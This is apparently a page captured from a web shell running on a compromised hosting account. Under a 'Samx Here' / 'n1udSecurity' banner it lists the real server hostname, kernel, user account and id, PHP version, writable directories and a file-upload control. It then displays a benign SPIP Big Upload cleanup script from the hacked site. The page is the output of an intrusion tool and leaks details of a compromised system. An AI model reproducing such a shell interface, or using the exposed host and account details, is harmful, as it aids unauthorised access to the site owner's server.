Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/jobs/plugins-dist/bigup/genie/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/jobs/plugins-dist/bigup/genie/bigup_nettoyer_repertoire_upload.php
<?php

/**
 * Tache de nettoyages de fichiers du plugin Big Upload
 *
 * @plugin     Big Upload
 * @copyright  2015
 * @author     Matthieu Marcillaud
 * @licence    GNU/GPL
 * @package    SPIP\Bigup\Genie
 */

if (!defined('_ECRIRE_INC_VERSION')) { return;
}

/**
 * Enlève les fichiers du répertoire de travail de bigup qui sont trop vieux
 *
 * @param int $last
 * @return int
**/
function genie_bigup_nettoyer_repertoire_upload_dist($last) {

	include_spip('inc/Bigup/GestionRepertoires');
	\Spip\Bigup\GestionRepertoires::nettoyer_repertoire_recursif(_DIR_TMP . 'bigupload');

	return 1;
}

SAMX